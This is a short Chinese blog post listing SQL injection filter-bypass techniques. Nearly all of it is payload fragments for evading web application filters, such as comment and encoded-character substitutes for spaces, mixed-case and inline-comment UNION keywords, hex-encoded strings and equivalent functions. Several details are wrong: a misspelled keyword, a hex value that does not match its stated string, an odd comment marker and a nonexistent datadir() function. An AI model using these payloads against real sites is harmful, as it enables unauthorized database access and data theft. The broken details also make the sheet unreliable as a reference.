首页 > 其他分享 >绕过方式

绕过方式

时间:2022-11-06 10:00:22浏览次数:42  
标签:方式 database union user 格式 绕过 select

 

常见绕过方式

1、空格绕过

格式 :  %20    %09    %0b    %0c   %0d   %00   /**/   /*!*/   +

如: '0'+'0'
select * from user where name=admin union/**/select ...

2、括号()绕过

格式: ()

如: select (user());
select (database());
select (user()) from (tables) where (1=1) and (2=2);

3、逗号过滤

格式1: from 1 for 1
substr(database(),1,1) ===== select substr(database()fron 1 for 1)
格式2:join
union select 1,2======union select * from (select1)a join (select2)b;

 

 

 

4、or、and、xor、not 

格式: and &&
or ||
xor |
not !

5、注释符绕过

格式: #      %123       -- -      --+      --  

or '1'='1’ and '1'='1‘ //逻辑词闭合

6、引号绕过

table_schema=’secturity'=====table_schema=0x73656375727479      // ’secturity'  转换为 十六进制(0x)

7、关键字绕过 

union ======= uNion                      //大小写绕过
union ======= /*!union*/ select ... //内联注释
union ======= ununionion                 //编码绕过
or 1=1 ====== url,ascii,hex,unicode //编码绕过

//等价函数
hex(),bin() ==== ascii()
sleep() ==== benchmark()
concat_ws ==== group_concat()
@@user ==== user()
@@datadir ==== datadir()


8、正则绕过

union /* '+ 'a' *100000+' */ select

  

 

标签:方式,database,union,user,格式,绕过,select
From: https://www.cnblogs.com/cshut/p/16859147.html

相关文章

  • 第2-1-2章 传统方式安装FastDFS-附FastDFS常用命令
    目录3安装配置3.1安装GCC3.2安装libevent3.3安装libfastcommon3.4安装FastDFS3.5安装fastdfs-nginx-module3.5安装Nginx3.6配置FastDFSTracker3.5.1配置Tracker3......
  • ro.deuggable=1的设置方式
    sailfish:/$propsLoading...Pleasewait.MagiskHidePropsConfigv6.1.2byDidgeridoohan@XDADevelopers=====================================Updatingfing......
  • 把数据直接上传到分区目录上,让分区表和数据产生关联的三种方式
    方式一:上传数据后修复上传数据--创建文件hive(default)>dfs-mkdir-p/user/hive/warehouse/mydb.db/dept_partition2/day=20200401/hour=13;--上传数据hive(de......
  • ipv4和ipv6与int互转通用处理方式
    记录一下ipv4和ipv6与int互转通用处理方式,由于ipv6转的int比较大,因此需要使用big.Int来保存packagemainimport( "fmt" "math/big" "net/netip")funcInetNt......
  • 【面试题】JS 常见的 6 种继承方式(常见)
    继承概念的探究说到继承的概念,首先要说一个经典的例子。先定义一个类(Class)叫汽车,汽车的属性包括颜色、轮胎、品牌、速度、排气量等,由汽车这个类可以派生出“轿车”和“货车......
  • 004.多种配置URL的方式
    1.Get方式对参数的处理(@RequestParam)/***描述:演示接口和传参*//@RestController表示返回时JSON格式不是页面*/@RestControllerpublicclassParaControl......
  • kubernetes 之二进制方式部署
      我的资料链接:https://pan.baidu.com/s/18g0sar1N-FMhzY-FCMqOog 两种集群架构图    多master需要在集群上面加个lb,所有的node都需要连接lb,lb帮你转发到a......
  • 几种对齐方式
    基线对齐(vertical-align:baseline)使元素的基线同基准元素(取行高最高的作为基准)的基线对齐顶端对齐(vertical-align:top)是将元素的行内框的顶端与行框的顶端对齐底端对齐......
  • 如何确定 this 指向?改变 this 指向的方式有哪些?
    this指向:1.全局上下文(函数外)无论是否为严格模式,均指向全局对象。注意:严格模式下全局对象为undifined2.函数上下文(函数内)默认的,指向函数的调用对象,且是最直接的调......
  • 组件之间通讯方式
    props:父向子传递$emit/v-on:子向父(通过派发)传递v-model:双向绑定slot:插槽(子组件通过插槽的方法传给父组件)provide/inject:依赖注入(可以指定传给后代的数据和方法)roo......